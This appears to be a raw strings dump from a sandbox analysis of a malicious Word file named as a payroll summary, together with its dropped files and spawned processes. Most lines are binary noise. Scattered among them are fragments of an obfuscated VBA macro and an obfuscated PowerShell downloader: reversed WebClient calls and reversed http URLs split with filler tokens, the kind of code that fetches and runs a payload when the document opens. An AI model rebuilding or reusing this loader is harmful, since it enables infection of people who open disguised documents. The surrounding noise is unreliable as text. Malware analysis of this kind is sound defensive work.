s6VTGHTG% tGqjH2LX!!!!$'V Z'X ^ `(! b dxXX fM hX j lX'\ p'n t vj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
S; Z~!P9giC!#B,;X=,I2UWV9$lk=Aj;{AP79|s*Y;[MChf]o{oY=1kyVV5E8Vk+\80X4D)!!?*|fv
Ansi based on Dropped File
(~WRD0000.tmp)
sctls_updown32
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Segoe Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Srye.T1%$rf 9]m/m;Pr-qmp8e
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sSXzHN(bhVZKVPDnCk`68030;OVIHH;37582(nBaUq9634c@rtdawG52135@;RKhJb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
StringFileInfo
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Sz+S9%c?o}GH-(ws:p.?J[akg
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
T tNmqd(KUKT@XsJakD16012yhPDwLk<`51920/<h`zitjl@-12041BHwJT32358=mdzuaOA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TdLY(PZQmLAgAs14623@JcgjCiCI6421FgrJzVl@74bKBESf8!KQjqTBt19!gDDDz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tdWGzM(szzHtc / hCdBu60563Fix(iXLof)) + 7886 - CLng(JXYOGS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
theme/theme/_rels/themeManager.xml.relsPK]<?.xy version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TTIIvt]KcK#v5+|D~O@%\w_nN[L9KqgVhn
Ansi based on Dropped File
(~WRD0000.tmp)
TXX 6F 8P~X : <X',X @'> D F HTr JZXX L7_ NX P RX'Bi` Z'X ^ ` b d!XX fr hFX j lX'\' p'n t v"K x2 zXX | ~)X X'rb.8Z ' + Z XX Yp ][X X' ' 1 nXX u fX X' i ' KQ ,XX rg leX X' ' W7 3 6XX yX X'Xi.%@S5i V/ %^c^EzK;;;;$' ' U: 3[XX bK +X X''X ' x TY tXX #1X X',74Ep^S^m^ojf@llll$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
u"xA@T_q64)kuV7t'%;i9s9x,-45xd8?d/Y|t&LILJ`& -Gt/PK!
Ansi based on Dropped File
(~WRD0000.tmp)
u/L&{!lcl&s^E]A5u~1g{@"`F)[s)[#6/\G6cw(#h,;_k73U1:N+<Z(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
u6KB#_vz~gz3NH/da1glQ@?}=n'N:x{Dy=v_oS8kG[sm>lGf=c-|s
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ve\GJAw1CoOj7~spEsAegk46qYf#DN#EWtq=~b]9r:8,5;"(,!mS3m:o
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VersionCompatible32="393222000"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vfR{Zm|wL3g#TF]OIZ<K6Le/DGdQYO|1!]B$hVk_
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Vladimir Script
Unicode based on Runtime Data
(WINWORD.EXE
)
VPdkoaGizFU zjsuLa!6420Ehwzww52oBbBwQ7476ceICzIr@@2!QdNSiR!e22492b2Oj0QiqcBZQilljRccwGTKaV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vpzrC(dnYzSo /@ LZDwv617/ Fix(wcMOuZ)B)1964CLng(SAsTj69846A#ALwBq22682 * BPTjwCStr(51368)`kmJjNRA=djzcpocTvjwpnRYv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VS_VERSION_INFO
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
w cjSmCmDFNo3ZWVKNu722892mDwphLs[4421mDXRHil28463ftWaYQ 75812lkXlWul52937liozA4l@ulaJCilj wZiwNHSqdff
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WfoHS(Q MjIjWoSHfwP97607PPiXMKP51922P@IvRTjiQ53493YzVXj74165APlhjZJP76315A(RhWTjG@(RvIPb@(oqQpF@$Fjfdr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wmKKizNapifiQ@(qpwQXvBKkp9037`+MtWmS+43#&is 813772rphfh30K@FhPvTn260VcVPnOLNYmLzEnd Function
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wQd%!=%FvIs0ZC////$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wSDqYpBsz....$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wubDbbz&`DwLrWRw820cSqJYDVT748cHBNL&2JGnlSucID="{90ACCF13-360F-4DB1-AAFF-575E015C6C17}"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WYTidzEdmKg~quLvjlMjREU;VGTwfDRHJtJbaKYQvwMBLnkzFVDLauX7MTnlZBMrCbXVt}GvEzWvlRXIMihCX-@iVwzaTPIMNiM0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X X' ' Z & 8XX (x n/X X'swJrwkwHsum%!!%FWraW15{5{5{5{$' ' ^/ T *XX I X X' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
x'9 z^XX | ~=X X'r9+mU9{QPDR% tes&&JXzpEFJorrplRzoXXXX$' ' ; d XX 4 /nX X' ' XX Y U1X X'mU9+JrwHsum%KGjBBBB$'mU9AmU ' -x O EXX (
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X'9f906fDF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UYrrrr$' ' v D XX `W >X "X'? &'$ * ,~ . 0XX 2 4PX 6 8X'(CR7izc[,)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf^^^;^$': >'< B D$ FJP HwXX J L5X N PX'@ T'R X Z] \_T ^(9XX `y3 b>XX d fX'VY76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuSS$'h l'j p rY tgO vXX x zX | ~X'n ' H ?1 mXX g SEX X'07zsP$+]4[emOHsp$ ( .ta9.<<<<$' ' FW B XX `6 X X' ' y @mXX m X X'lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7fzzzz$' ' ` PbXX -& X X' ' / XX t`X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Xdlt|Ryfewujashowavae46504Ryfewujasho58022Normal1Microsoft Office Word@@(@Z`+.+,0,x
Ansi based on Dropped File
(~WRD0003.tmp)
Xi6ei-n8%eKO=^az>$m$*}0Y#$u\[i
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XisUrt(ijidh / zLYXfE63452Fix(pWA Vuj))b40717QCLng(iqjDRCA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
xk4Vz;[@-cQ%rxZ.. )OR_h$09ARzGp}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX jX X'H2z% tes&&rHBCSAFllQp0kllll$' ' k Y "WdXX $3 &'GX ( *X' .', 2 4e 6 8oXX :V <kX > @X'0 HjwUfYsdMLdmXo%!!%Isoh8W$$$$$'BMZ F'D J L Nj PCXX R9C TX V XX'Ha \'Z ` b% dDA fLeXX hW j X l nX'^ MBDtes&&zsTahziwh48JTJTJT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX X X'o8( ' g XX k MX X' A@ ' { XX L [X X'o( ' = dXX , ,X X'imeZon '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX t v>EX x zX'j@rnE ~'| b 6 3XX @ EX X'|QXiQwRHh=%zNafst$' ' R: QXX zX X'mU9/ ' DL i N9XX x! X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XXFq&ll=%PInYdOqGm% 57im[[[[$'j
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
y`F:%PROGRAMFILES%\Microsoft Office\Root\Office16\MSWORD.OLBWord
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z-4F+xMET`@IV28vI"dxB`bhb`bhxdbvXf@^HbdxHfPbn(d
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z0Zf!Zf!Zf!+Z(FFZFFFFFZFFFFFFFf!FFFFFFFFF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Z79xx/\.:}]=gYl:5Fjpvh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zjUG=zWGvA(hCpdYXGwLa34=PdYbBC)) + 32824 - CLng(JYhLb`35979@UvCcJY\54552 * tETLsStr(97126) / UlLpjzsYvEij)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
zTZADLcFXJtFREzTZADLcFXJtFREFPAOsHRZpzGcVHFPAOsHRZpzGcVHHULSuHBvjHULSuHBvjuIpNwjviPROJECTwmnCompObjqruIpNwjviizosJmiCizosJmiC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data
(cmnmspthrd.exe
)
|*.bmp;*.cur;*.dib;*.emf;*.ico;*.wmf|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
~!2g/<+u;2j76qg?_\y]^UvEaC/cod2^gltS-QTfQEQEQEQEQEQEQEQEQEQEQEQEQEQE?q?qfAW|'S5uyyo>;r=&(>++"?S^^[AGS<(?BqF [OW_DhtE{9F>c>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
~JTe\O*tHGHY}KNP*T9/#A7qZ$*c?qUnwN%Oi4=3N)cbJ
Ansi based on Dropped File
(~WRD0000.tmp)
�����������������������������������������������������������?����������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?��������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
!"#$%&'()*+,-./012345689:;<=>?@ADEFa *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal2\(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library?\&4zTZADLcFXJtFRE0<5cd8073f)zTZADLcFXJtFREt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!"#$%&'()*+,-./012356789:;<=>?@ABCDWXaE[\]^_`defghijklmnopqrstuvwxyz{|}~Root EntryF0Z@ Data
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!"#%&()*+,-./01345679:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcefghijklmoprtuvwxyz|}~0*pHdProjectQ(@=
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!Ae1086B=ksPEEBPbGCic@(iqzILs$ssQa@olhfZf(I dFGAjnTcy/ 19fA(VviPtB96872(ccYSow(7489eYmInk70(lsIijE( 59600eQjbuMB(pCPjj(nkSOa@EVHQJA@%weRfjE8^D ^c^% 8D@f4431Aal, -jBjnMbuqXL
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!AHHCZ%75156iVwuE625@M* HIJmM6312zUhUQ OGXWPwVurLGdno@dar11%bHY@KFlwode@sXYf%522p9395`b, E
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"' & (= *( ,[XX .! 0T-X 2 4X'$
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"/e5[s`Z'WfPt~f}kA'0z|>|Uw{@tAm'`4T2j
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"1(IzZ~>Yr]H+9pd\4n(Kg\V$=]B,lDA=eX)Ly5otebW3gp:j$/g*QjZTa!e9#i5*j5fE`514g{7vnO(^ ,j~V9;kvv"adVoTAn7jah+y^@ARhW.GMuO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"HCqt>;tB]9[9#V1+F)rzb;n5![`lSKh:/n$Ts+wH>b0xgM_jf,ZICr$F3?:BxLu=Jk#Khb$pA=3+?9(ixR3;3+|5;f/qD$G'?6y5c[K|9|u$r=A"bpUs;P{~9fAj72p|E8l^{yowd|YV;(!ebIku}<'V_mWC8<ix~#MKO77\<KdTdu#>q.|@ilA.2Xe\Ktx9s/ivi.6\v9F0jRtt&)KDl s<OCWTOHdo g`\A)v~U:wMl>R^"*76*v\)<pqZ;X&YC*@ $
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"I8XXXh8@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"iGJqhUqlO0oiZI25W5WIntb ZAZjtTrjld5F`249v`5K$1!2@ztcDOv0JzvwLj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
#-q8|.[Ck4*j)jnc"ePG7;.h
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
#nNwpzAV5012A;nSTfG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$ 'AKfY ' z Wo XX jX "X' $ &'X *'( . 0' 2^\ 4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$' ' ! < XX X X' ' ? ` VXX L BX X'7I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- )mU9}'+'}'+'mU9+mU9{hCkBBB0B$'.C ' +X P XX }8X X'C++- ' ` Z XX V .X X'ata.,jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ$' ' Ii % beXX m "X X' ' u !rXX 3X
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$'8 <': @ B> D F/XX Hf~ Jq*X L NX'>mU R'P V XaM Zhz \$XX ^z% `X b dX'TRfjE8^p^S^m^o^c^% 8D$'f j'h n p r|f tXX v xT#X z |X'l' '~ F8 XX z1X X'Rcs.AbRp c/ k.l.l.l.l$' ' - MXX a 6X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$.' ",#(7),01444'9=82<.342C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$E\amR]:B6}9?*<Wfap b1Kc\VCi_7WSUC:ZErq<{J+YsM\#JR<ve. }R9"7V)2GB&|9E;MMTO%Hq88G'v.AnNG*zy{
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' Bn XX yX X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' E" EXX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' W XX i "X X' ' $ &E ( *XX ,| .}X 0 2X'"{ "N" KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi$'4 : 0 8'6 < >( @ B<nXX Dy FX H JX':"V" N'L R TB Vq XjXX Z^| \WX ^ `X'Pd.Oa d" f'btr j'h n p" r tXX v@ xyX z |X'lEnable ~ b | T 4 N & : h'V" : ' M# =XX eX X'i ' w M UXX X X'icro ' M j ^XX s X X'7:44:5oAttribute VB_Name = "FPAOsHRZpzGcVH"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' ( L XX X X X'$ $'" ( *X ,2 .YXX 0 2imX 4 6X'&cRkY soLFNFiN dw4kmS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' = ^ NXX zm X X' ' Xa a !XX y> X X'1o` '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' J $XX # $X X' Z18aIlstes&&eh=%fXnREwXL,$'" &'$ * ,Z . 0yXX 2~ 4X 6 8X'(' <': @ B\ D FC%XX Hx J=pX L NX'>lDlPGtes&&GwBRPlJz=%mKF[[[[$'PmU T'R X Z1 \ ^UHXX `z< bOX d fX'V j'h n p r8 tXX v xf{X z |X'l12Ces&&s=%NoUfYsKZ7J===
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' x Z 7oXX l xuX X'(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' |n J tXX mX X'V
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'-1'F+!'HULSuHBvjGDHUMSu"BvjL2O 6O K uIpNwjviGAIpNbwvii2ro3oizosJmiCUci0o2J ki|Cdecmo3@m#iK**\CNormalrU~~~~~~l^i"Ks{e!9Yq9aXU\WH.<NThisDocumentProjectzTZADLcFXJtFREModule1FPAOsHRZpzGcVHHULSuHBvjuIpNwjviizosJmiCFB%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLLVBA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'.Y8?iF7MV_%0kRN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'/U-0y.6=}+zk"h<E7XRk}C:V
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'2 2XX ) X X'Xt.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZKKKRK$' ' 5 XX X X' ' + 5 eXX bq X X's.EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada...m.$'{ ' ` 9 DXX nX X'' ' G 8XX i X X'Hw0mU9;)CDSAxmU9+m'+'U91 ,mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv&t&t&tB&t$' ' Y XX g&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'96mLHVO6hKlBbEnd Functio@Sub SmbZcw(LzqMAC, ABEmrN, iEjifo)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'B='8\L`"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'theme/theme/_rels/themeManager.xml.relsM
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((w666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@6666 OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(/Q*9 +=GZ|5j~;{ii{@\$Y#Cqap{CjEZ\E,Ml-n;r6E}CS.R_GB60wFur|=\]^wk/l8<i-17qas-=:jNM&p@fPFS![ck68h~4{T6RMvAddXs<gO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(08Normal.dotm1Microsoft Office Word@@W@WRyfewuja84323Ryfewujasho58022Ryfewujashowavae46504.+,0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(;:ujM,"d?%zWSjWzuciny1UBXm?l?e7V2FwNR\xGV9&]SCx
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(`/(A`/n__SRP_32MizosJmiCc=uIpNwjvi8
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(p2x&(((((((((((((((((((((((((((((((((((((((22y(((Oqa<6oi;Xm5bR!"kLm.UTHeRzl:}V|jZg.m@)-"k66W,1_jmuWZqd2`vL-eM?QOgwyojZTR?I'i~<!jGG-$$nnn#9gn[\W7>ZJ$]0>aO_^7V6t,QccL\9RBch@~1'7=JPM+R~n$m+(dX0` q=4@9cWM}~a/c% [k1SN;pqwWc[KMMePG%Ps7a.7+S}~'=RSd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(sKEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQER>PEPEPEPEPEPEPH$QXztm+uzQ,}WM.`_9zT&waN#&$/#(%v5shYExj:&fGGN{8v)~_q5I|BUFS?g
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(X X'$ ' - f> BXX < a?X " $X'cewCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W$'&7:04 *'( . 0+@ 2P 4XX 6Xl 8gX : <X',ta.Fir @'> D F HB JXX LZ NCX P RX'B5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uCeeee$'T X'V \ ^t `Zl bXX d f:X h jX'Z n'l r t8B v xjKXX zd | X ~ X'p8WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(YjGiLfbTvBha-6351|RBov16912RldULG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(|3Oj>!M:b=7G\U%]TrjnZ\w?
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
)1yfxxQ|9XJM$d\a^{kOj1ew).HJB\a04j(}6gU'A^-{]\+| g7CKbl JcreMQMRP2xv`j-WuD=]:xKytyHlXW[O<F>cbC{jc->JK"jyjt+ieSj e[9}x
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
*8xVRvtsp>~%76hz_'mR9&Nk^rJ.
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
*w ,v-XX .@ 0VX 2 4X'$OwJQO+wFc.l&%tttt$'6YY :'8 > @1 Bx D[XX F H-X J LX'<m P'N T V X ZEXX \ ^3X ` bX'RkBSvYhmXnjzGDhFf% te,wdP$'d' h'f l ne pJq r)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+51[%YdQUZA<97790<lTKPrE<98612eKqiiO<iWGoYC@<@MrTCkW$GinD(UVKPS!DoiZdMAuHKf)1A2FFtAIi"41232a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+iK|>>xf5
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+INKkD\ox~k#nmnf-H@:z75>g\OuXG6h4t
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+W+WZFZZZWP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
,(jcAV rx91v9uOceUlC~U9upmU9+Q0:vne8A8x1 = '+'CDSAx 1;)JQ(O@JQO(ti
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!g theme/theme/theme1.xmlPK-!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
,6+mU9JQO8r%J$' ' T u3 BXX 6 X X' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
-<Cq8?~*
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
/O % 4XX \B @X X' ' "wM $& &.XX (= *X , .X'6Kt%bHYKFlwokA4$'0 4'2 8 : < >XX @? BX D FX'6
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
/T#WLvS94f2rpmjBz1817QUs`lVnhc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0046}#2.0#0#%WINDIR%\system32\e2.tlb#OLE Automation`ENormalENCrmaQF *,\C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
043YYFGTa8226F EwaNrF504PDaaWLzX!6854!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0h@>nBVqu {5kP?O&CAw0kPo(h[5($=CVs]mY2zw`nKDC]j%KXK'P@$I=Y%C%gx'$!V(ek'Qt!x7xbJ7 oW_y|n;Fido/_1z/L?>o_;9:33`=S,F@)R8elmEv|!/,%qh|'1:`ij.u'kCZ^WcK0'E8Ssd`K}A"NM1I/AeQGF@A~eh-QR9C5
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0No ListRR$Z0Balloon TextdCJOJQJ^JaJN/N$Z0Balloon Text CharCJOJQJ^JaJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0Table Normal4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0zc$sk4/|)}i:i:WGrv=qSeO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
1073HSSGZ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
14pfbu zoGdnp74101
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
168wU]PXI - CStr(61279) / SNjdC8CLng(XdnfXI)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
197Q* UqrJBbaS`c78%`EGccIB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
1p&VNRtGJ 41BBrkizQ|9mwWA4wdJ9A"YljMWFR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
1yL-[DR?%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE16\MSO.DLLOffice
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2!!22222222222222222222222222222222222222222222222222"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
22JYxMGVQ"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2652VON0oD%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2@9a0DABA!RhYQQ@JrhdAq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2mA!OfficgODficg!G{2DF8D04C-5BFA-101B-BDE5gAAe42ggram Files\@CommonMicrosoft Shared\OFFICE16\MSO.DLL#M 16.0 Ob Library%z4@zTZADLcFXJtFREGTZ@ADL@7FXJnFREP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2p;JXuiQB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2Q^HG-o.&y,G||Hk2mIpBke~-G5p?j}s#QEzR g@CCo$akDk~ _-,Yd[mam:a:.Y9^^)'^53Fem^^53F^c>GKuUt+(vR<G3#gG;?<i9Gg54`u$F95SBgoh %@f'M{qQ,qTQ`^c)F-^]l9YK86=
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2RvIPSNiRHXmaMztiX! jUMV}(CmDiI1uViT,9784A3`hUdPw!1AFLiVlfz653292QirQR?32509#vOdPSj
